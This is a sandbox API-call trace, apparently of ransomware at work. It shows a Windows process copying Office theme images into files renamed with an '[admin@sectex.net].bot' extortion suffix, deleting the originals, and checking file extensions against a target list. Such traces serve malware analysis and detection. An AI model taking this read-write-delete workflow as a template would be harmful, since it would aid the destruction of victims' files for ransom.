	[0043.041] WriteFile (in: hFile=0x1c0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.041] SetEndOfFile (hFile=0x1c0) returned 1
	[0043.041] CloseHandle (hObject=0x1c0) returned 1
	[0043.042] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.042] SetEndOfFile (hFile=0x1fc) returned 1
	[0043.043] CloseHandle (hObject=0x1fc) returned 1
	[0043.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.043] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 1
	[0043.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.043] lstrlenW (lpString=".doc") returned 4
	[0043.043] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.043] lstrlenW (lpString=".docx") returned 5
	[0043.043] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.043] lstrlenW (lpString=".pdf") returned 4
	[0043.043] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.043] lstrlenW (lpString=".xls") returned 4
	[0043.044] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.044] lstrlenW (lpString=".xlsx") returned 5
	[0043.044] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.044] lstrlenW (lpString=".ppt") returned 4
	[0043.044] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.044] lstrlenW (lpString=".zip") returned 4
	[0043.044] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.044] lstrlenW (lpString=".rar") returned 4
	[0043.044] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.044] lstrlenW (lpString=".bz2") returned 4
	[0043.044] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.044] lstrlenW (lpString=".7z") returned 3
	[0043.044] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.044] lstrlenW (lpString=".dbf") returned 4
	[0043.044] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.044] lstrlenW (lpString=".1cd") returned 4
	[0043.044] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.044] lstrlenW (lpString=".jpg") returned 4
	[0043.044] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.044] lstrlenW (lpString=".doc") returned 4
	[0043.044] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.044] lstrlenW (lpString=".docx") returned 5
	[0043.044] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.044] lstrlenW (lpString=".pdf") returned 4
	[0043.044] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.044] lstrlenW (lpString=".xls") returned 4
	[0043.044] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.044] lstrlenW (lpString=".xlsx") returned 5
	[0043.045] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.045] lstrlenW (lpString=".ppt") returned 4
	[0043.045] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.045] lstrlenW (lpString=".zip") returned 4
	[0043.045] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.045] lstrlenW (lpString=".rar") returned 4
	[0043.045] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.045] lstrlenW (lpString=".bz2") returned 4
	[0043.045] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.045] lstrlenW (lpString=".7z") returned 3
	[0043.045] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.045] lstrlenW (lpString=".dbf") returned 4
	[0043.045] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.045] lstrlenW (lpString=".1cd") returned 4
	[0043.045] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75
	[0043.045] lstrlenW (lpString=".jpg") returned 4
	[0043.045] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.045] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.045] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0043.046] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=945) returned 1
	[0043.046] CloseHandle (hObject=0x1fc) returned 1
	[0043.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 0x20
	[0043.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0043.048] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.048] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0043.362] GetLastError () returned 0x0
	[0043.362] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x3b1, lpOverlapped=0x0) returned 1
	[0043.415] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x3c0, lpOverlapped=0x0) returned 1
	[0043.416] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.416] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.416] SetEndOfFile (hFile=0x190) returned 1
	[0043.417] CloseHandle (hObject=0x190) returned 1
	[0043.417] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.417] SetEndOfFile (hFile=0x1fc) returned 1
	[0043.418] CloseHandle (hObject=0x1fc) returned 1
	[0043.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.418] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 1
	[0043.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.419] lstrlenW (lpString=".doc") returned 4
	[0043.419] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.419] lstrlenW (lpString=".docx") returned 5
	[0043.419] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.419] lstrlenW (lpString=".pdf") returned 4
	[0043.419] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.419] lstrlenW (lpString=".xls") returned 4
	[0043.419] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.419] lstrlenW (lpString=".xlsx") returned 5
	[0043.419] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.419] lstrlenW (lpString=".ppt") returned 4
	[0043.419] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.419] lstrlenW (lpString=".zip") returned 4
	[0043.419] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.419] lstrlenW (lpString=".rar") returned 4
	[0043.419] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.419] lstrlenW (lpString=".bz2") returned 4
	[0043.419] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.419] lstrlenW (lpString=".7z") returned 3
	[0043.419] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.419] lstrlenW (lpString=".dbf") returned 4
	[0043.419] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.419] lstrlenW (lpString=".1cd") returned 4
	[0043.419] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.419] lstrlenW (lpString=".jpg") returned 4
	[0043.419] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.419] lstrlenW (lpString=".doc") returned 4
	[0043.419] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.420] lstrlenW (lpString=".docx") returned 5
	[0043.420] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.420] lstrlenW (lpString=".pdf") returned 4
	[0043.420] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.420] lstrlenW (lpString=".xls") returned 4
	[0043.420] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.420] lstrlenW (lpString=".xlsx") returned 5
	[0043.420] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.420] lstrlenW (lpString=".ppt") returned 4
	[0043.420] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.420] lstrlenW (lpString=".zip") returned 4
	[0043.420] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.420] lstrlenW (lpString=".rar") returned 4
	[0043.420] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.420] lstrlenW (lpString=".bz2") returned 4
	[0043.420] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.420] lstrlenW (lpString=".7z") returned 3
	[0043.420] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.420] lstrlenW (lpString=".dbf") returned 4
	[0043.420] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.420] lstrlenW (lpString=".1cd") returned 4
	[0043.420] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74
	[0043.420] lstrlenW (lpString=".jpg") returned 4
	[0043.420] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.420] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.420] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.421] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.429] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2044) returned 1
	[0043.429] CloseHandle (hObject=0x170) returned 1
	[0043.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 0x20
	[0043.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.429] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.429] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0043.441] GetLastError () returned 0x0
	[0043.441] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x7fc, lpOverlapped=0x0) returned 1
	[0043.465] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x800, lpOverlapped=0x0) returned 1
	[0043.466] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.466] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.466] SetEndOfFile (hFile=0x190) returned 1
	[0043.466] CloseHandle (hObject=0x190) returned 1
	[0043.467] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.467] SetEndOfFile (hFile=0x170) returned 1
	[0043.468] CloseHandle (hObject=0x170) returned 1
	[0043.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.468] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 1
	[0043.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.468] lstrlenW (lpString=".doc") returned 4
	[0043.468] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.468] lstrlenW (lpString=".docx") returned 5
	[0043.468] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.468] lstrlenW (lpString=".pdf") returned 4
	[0043.468] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.468] lstrlenW (lpString=".xls") returned 4
	[0043.468] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.469] lstrlenW (lpString=".xlsx") returned 5
	[0043.469] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.469] lstrlenW (lpString=".ppt") returned 4
	[0043.469] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.469] lstrlenW (lpString=".zip") returned 4
	[0043.469] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.469] lstrlenW (lpString=".rar") returned 4
	[0043.469] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.469] lstrlenW (lpString=".bz2") returned 4
	[0043.469] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.469] lstrlenW (lpString=".7z") returned 3
	[0043.469] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.469] lstrlenW (lpString=".dbf") returned 4
	[0043.469] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.469] lstrlenW (lpString=".1cd") returned 4
	[0043.469] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.469] lstrlenW (lpString=".jpg") returned 4
	[0043.469] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.469] lstrlenW (lpString=".doc") returned 4
	[0043.469] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.469] lstrlenW (lpString=".docx") returned 5
	[0043.469] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.469] lstrlenW (lpString=".pdf") returned 4
	[0043.469] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.469] lstrlenW (lpString=".xls") returned 4
	[0043.469] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.469] lstrlenW (lpString=".xlsx") returned 5
	[0043.469] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.470] lstrlenW (lpString=".ppt") returned 4
	[0043.470] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.470] lstrlenW (lpString=".zip") returned 4
	[0043.470] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.470] lstrlenW (lpString=".rar") returned 4
	[0043.470] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.470] lstrlenW (lpString=".bz2") returned 4
	[0043.470] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.470] lstrlenW (lpString=".7z") returned 3
	[0043.470] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.470] lstrlenW (lpString=".dbf") returned 4
	[0043.470] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.470] lstrlenW (lpString=".1cd") returned 4
	[0043.470] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76
	[0043.470] lstrlenW (lpString=".jpg") returned 4
	[0043.470] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.470] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.470] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.471] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1293) returned 1
	[0043.471] CloseHandle (hObject=0x170) returned 1
	[0043.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 0x20
	[0043.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.471] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.471] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0043.473] GetLastError () returned 0x0
	[0043.473] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x50d, lpOverlapped=0x0) returned 1
